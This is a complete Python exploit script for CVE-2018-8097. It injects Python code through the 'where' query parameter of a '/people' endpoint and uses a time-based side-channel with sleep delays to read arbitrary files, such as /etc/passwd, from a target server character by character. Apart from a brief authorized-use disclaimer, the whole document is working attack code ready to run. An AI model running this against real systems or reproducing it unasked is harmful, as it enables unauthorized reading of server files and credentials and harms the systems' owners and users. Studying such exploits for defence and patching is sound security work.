#!/usr/bin/env python3
"""
🧨 CVE-2018-8097 RCE Blind File Extractor 🧨

Exploits a Python code injection vulnerability (e.g., via eval()) to exfiltrate the content
of arbitrary files on a vulnerable server using a time-based side-channel attack.

Supports:
✔️ Any file path
✔️ Custom ObjectId
✔️ Clean output (silent unless -v)
✔️ Robust URL handling

Use only on systems you are authorized to test 💀
"""

import argparse
import requests
import string
import time
import sys


def parse_args():
    parser = argparse.ArgumentParser(
        description="🧨 CVE-2018-8097 RCE-based Blind File Reader — Exfiltrates file contents using time-based delay via Python code injection."
    )

    parser.add_argument("-u", "--url", required=False, help="Target base URL (e.g., http://127.0.0.1:5000)")
    parser.add_argument("-d", "--dir", required=False, help="Path to the file on the target system (e.g., /etc/passwd)")
    parser.add_argument("-id", "--objectid", required=False, help="MongoDB ObjectId value for the injection")
    parser.add_argument("-t", "--time", type=int, default=3, help="Delay in seconds for time-based check (default: 3)")
    parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose output (shows found characters)")
    parser.add_argument("-m", "--max-length", type=int, default=100, help="Maximum file length to read (default: 100)")

    args = parser.parse_args()

    # Manual required checks
    missing = []
    if not args.url:
        missing.append("-u/--url")
    if not args.dir:
        missing.append("-d/--dir")
    if not args.objectid:
        missing.append("-id/--objectid")
    if missing:
        print(f"[!] Missing required arguments: {', '.join(missing)}")
        parser.print_help()
        sys.exit(1)

    return args


def guess_char(index, url, filepath, objectid, delay, charset, verbose):
    for c in charset:
        payload = (
            f'_id==ObjectId("{objectid}\') and '
            f'__import__(\'time\').sleep({delay}*(open(\'{filepath}\').read()[{index}]==\'{c}\')) and (\'")'
        )

        try:
            start = time.time()
            requests.get(url, params={'where': payload}, timeout=delay + 1)
            elapsed = time.time() - start
        except requests.exceptions.ReadTimeout:
            if verbose:
                print(f"[✓] Character {index}: '{c}'")
            return c

        if elapsed > delay:
            if verbose:
                print(f"[✓] Character {index}: '{c}'")
            return c

    return None


def extract_file(args):
    # Normalize URL and append /people only if needed
    base_url = args.url.rstrip("/")
    if not base_url.endswith("/people"):
        base_url += "/people"

    charset = ''.join(sorted(set(string.printable)))
    output = ""

    print("\n📡 Starting RCE Blind Exfiltration (CVE-2018-8097)")
    print(f"📍 Target: {base_url}")
    print(f"📂 File: {args.dir}")
    print(f"🧬 ObjectId: {args.objectid}")
    print(f"⏱️  Delay threshold: {args.time} seconds\n")

    for i in range(args.max_length):
        char = guess_char(i, base_url, args.dir, args.objectid, args.time, charset, args.verbose)
        if not char:
            print("[!] No more characters found. Stopping.")
            break
        output += char
        if args.verbose:
            print(f"[>] Output so far: {output}")

    print(f"\n🎉 Final Output:\n{output}")


if __name__ == "__main__":
    args = parse_args()
    extract_file(args)
